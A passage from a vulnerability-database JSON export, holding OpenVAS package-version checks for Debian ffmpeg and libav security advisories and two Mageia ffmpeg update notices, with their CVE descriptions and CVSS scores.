"CVE-2018-13302", "CVE-2018-7557", "CVE-2018-6392", "CVE-2018-12458", "CVE-2018-10001"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704249", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4249-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704249\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-10001\", \"CVE-2018-12458\", \"CVE-2018-13300\", \"CVE-2018-13302\", \"CVE-2018-6392\",\n \"CVE-2018-6621\", \"CVE-2018-7557\");\n script_name(\"Debian Security Advisory DSA 4249-1 (ffmpeg - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-17 00:00:00 +0200 (Tue, 17 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4249.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ffmpeg on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 7:3.2.11-1~deb9u1.\n\nWe recommend that you upgrade your ffmpeg packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/ffmpeg\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg-doc\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libav-tools\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra57\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec57\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice57\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra6\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter6\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat57\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample3\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil55\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc54\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample2\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale4\", ver:\"7:3.2.11-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:29:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-12-06T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for libav (DLA-2021-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18245", "CVE-2019-14443", "CVE-2019-17542", "CVE-2018-19130", "CVE-2018-19128", "CVE-2017-17127"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310892021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892021", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892021\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-17127\", \"CVE-2017-18245\", \"CVE-2018-19128\", \"CVE-2018-19130\", \"CVE-2019-14443\", \"CVE-2019-17542\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-06 03:00:15 +0000 (Fri, 06 Dec 2019)\");\n script_name(\"Debian LTS: Security Advisory for libav (DLA-2021-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/12/msg00003.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2021-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libav'\n package(s) announced via the DLA-2021-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several security issues were fixed in libav, a multimedia library for\nprocessing audio and video files.\n\nCVE-2017-17127\n\nThe vc1_decode_frame function in libavcodec/vc1dec.c allows remote\nattackers to cause a denial of service (NULL pointer dereference\nand application crash) via a crafted file.\nCVE-2018-19130 is a duplicate of this vulnerability.\n\nCVE-2017-18245\n\nThe mpc8_probe function in libavformat/mpc8.c allows remote\nattackers to cause a denial of service (heap-based buffer\nover-read) via a crafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\nHeap-based buffer over-read in decode_frame in libavcodec/lcldec.c\nallows an attacker to cause denial-of-service via a crafted avi\nfile.\n\nCVE-2019-14443\n\nDivision by zero in range_decode_culshift in libavcodec/apedec.c\nallows remote attackers to cause a denial of service (application\ncrash), as demonstrated by avconv.\n\nCVE-2019-17542\n\nHeap-based buffer overflow in vqa_decode_chunk because of an\nout-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\");\n\n script_tag(name:\"affected\", value:\"'libav' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libav-dbg\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libav-doc\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libav-tools\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra-56\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec56\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice55\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter5\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat56\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample2\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil54\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale3\", ver:\"6:11.12-1~deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:27:08", "description": "Several security vulnerabilities were corrected in the libav\nmultimedia library which may lead to a denial-of-service, information\ndisclosure or the execution of arbitrary code if a malformed file is\nprocessed.\n\nCVE-2017-9993\n\nLibav does not properly restrict HTTP Live Streaming filename\nextensions and demuxer names, which allows attackers to read\narbitrary files via crafted playlist data.\n\nCVE-2017-9994\n\nlibavcodec/webp.c in Libav does not ensure that pix_fmt is set,\nwhich allows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) or possibly have\nunspecified other impact via a crafted file, related to the\nvp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\nDenial-of-service in mv_read_header() due to lack of an EOF (End of\nFile) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\nDenial-of-service in rl2_read_header() due to lack of an EOF\n(End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\nDenial-of-service in asf_read_marker() due to lack of an EOF\n(End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\nDenial-of-service in mxf_read_index_entry_array() due to lack of an\nEOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\nDenial-of-service in nsv_parse_NSVf_header() due to lack of an EOF\n(End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\nThe sdp_parse_fmtp_config_h264 function in\nlibavformat/rtpdec_h264.c mishandles empty sprop-parameter-sets\nvalues, which allows remote attackers to cause a denial of service\n(heap buffer overflow) or possibly have unspecified other impact via\na crafted sdp file.\n\nCVE-2017-15672\n\nThe read_header function in libavcodec/ffv1dec.c allows remote\nattackers to have unspecified impact via a crafted MP4 file, which\ntriggers an out-of-bounds read.\n\nCVE-2017-17130\n\nThe ff_free_picture_tables function in libavcodec/mpegpicture.c\nallows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) or possibly have\nunspecified other impact via a crafted file, related to\nvc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\nThe decode_frame function in libavcodec/utvideodec.c in Libav allows\nremote attackers to cause a denial of service (out of array read)\nvia a crafted AVI file.\n\nCVE-2018-7557\n\nThe decode_init function in libavcodec/utvideodec.c in\nLibav allows remote attackers to cause a denial of service\n(Out of array read) via an AVI file with crafted dimensions within\nchroma subsampling data.\n\nCVE-2018-14394\n\nlibavformat/movenc.c in Libav allows attackers to cause a\ndenial of service (application crash caused by a divide-by-zero\nerror) with a user crafted Waveform audio file.\n\nCVE-2018-1999010\n\nLibav contains multiple out of array access vulnerabilities in the\nmms protocol that can result in attackers accessing out of bound\ndata.", "cvss3": {}, "published": "2019-01-08T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for libav (DLA-1630-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-14171", "CVE-2017-14056", "CVE-2017-9994", "CVE-2018-1999010", "CVE-2018-14394", "CVE-2017-9993", "CVE-2018-6621", "CVE-2017-14767", "CVE-2018-7557", "CVE-2017-15672", "CVE-2017-17130", "CVE-2017-14055", "CVE-2017-14170", "CVE-2017-14057"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891630", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891630", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891630\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-14055\", \"CVE-2017-14056\", \"CVE-2017-14057\", \"CVE-2017-14170\", \"CVE-2017-14171\",\n \"CVE-2017-14767\", \"CVE-2017-15672\", \"CVE-2017-17130\", \"CVE-2017-9993\", \"CVE-2017-9994\",\n \"CVE-2018-14394\", \"CVE-2018-1999010\", \"CVE-2018-6621\", \"CVE-2018-7557\");\n script_name(\"Debian LTS: Security Advisory for libav (DLA-1630-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-08 00:00:00 +0100 (Tue, 08 Jan 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/01/msg00006.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"libav on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u4.\n\nWe recommend that you upgrade your libav packages.\");\n\n script_tag(name:\"summary\", value:\"Several security vulnerabilities were corrected in the libav\nmultimedia library which may lead to a denial-of-service, information\ndisclosure or the execution of arbitrary code if a malformed file is\nprocessed.\n\nCVE-2017-9993\n\nLibav does not properly restrict HTTP Live Streaming filename\nextensions and demuxer names, which allows attackers to read\narbitrary files via crafted playlist data.\n\nCVE-2017-9994\n\nlibavcodec/webp.c in Libav does not ensure that pix_fmt is set,\nwhich allows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) or possibly have\nunspecified other impact via a crafted file, related to the\nvp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\nDenial-of-service in mv_read_header() due to lack of an EOF (End of\nFile) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\nDenial-of-service in rl2_read_header() due to lack of an EOF\n(End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\nDenial-of-service in asf_read_marker() due to lack of an EOF\n(End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\nDenial-of-service in mxf_read_index_entry_array() due to lack of an\nEOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\nDenial-of-service in nsv_parse_NSVf_header() due to lack of an EOF\n(End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\nThe sdp_parse_fmtp_config_h264 function in\nlibavformat/rtpdec_h264.c mishandles empty sprop-parameter-sets\nvalues, which allows remote attackers to cause a denial of service\n(heap buffer overflow) or possibly have unspecified other impact via\na crafted sdp file.\n\nCVE-2017-15672\n\nThe read_header function in libavcodec/ffv1dec.c allows remote\nattackers to have unspecified impact via a crafted MP4 file, which\ntriggers an out-of-bounds read.\n\nCVE-2017-17130\n\nThe ff_free_picture_tables function in libavcodec/mpegpicture.c\nallows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) or possibly have\nunspecified other impact via a crafted file, related to\nvc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\nThe decode_frame function in libavcodec/utvideodec.c in Libav allows\nremote attackers to cause a denial of service (out of array read)\nvia a crafted AVI file.\n\nCVE-2018-7557\n\nThe decode_init function in libavcodec/utvideodec.c in\nLibav allows remote attackers to cause a denial of service\n(Out of array read) via an AVI file with crafted dimensions within\nchroma subsampling data.\n\nCVE-2018-14394\n\nlibavformat/movenc.c in Libav allows attackers to cause a\ndenial of service (application crash caused by a divide-by-zero\nerror) with a user crafted Waveform audio file.\n\nCVE-2018-1999010\n\nLibav contains multiple out of array access vulnerabilities in the\nmms protocol that can result in attackers accessing out of bound\ndata.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libav-dbg\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libav-doc\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libav-tools\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra-56\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec56\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice55\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter5\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat56\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample2\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil54\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale3\", ver:\"6:11.12-1~deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated ffmpeg packages fix security vulnerabilities: This update provides ffmpeg version 4.1.5, which fixes several bugs, and atleasst the follwing security vulnerabilities: In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer (CVE-2019-17539). FFmpeg before 4.2 has a heap-based buffer overflow in vqa_decode_chunk because of an out-of-array access in vqa_decode_init in libavcodec/ vqavideo.c (CVE-2019-17542). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T10:37:29", "type": "mageia", "title": "Updated ffmpeg packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539", "CVE-2019-17542"], "modified": "2020-01-22T10:37:29", "id": "MGASA-2020-0046", "href": "https://advisories.mageia.org/MGASA-2020-0046.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This update provides ffmpeg version 3.3.8, which fixes several security vulnerabilities and other bugs which were corrected upstream. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-07-23T22:27:34", "type": "mageia", "title": "Updated ffmpeg packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10001", "CVE-2018-12458", "CVE-2018-13300", "CVE-2018-13302", "CVE-2018-6392", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2018-07-23T22:27:34", "id": "MGASA-2018-0319", 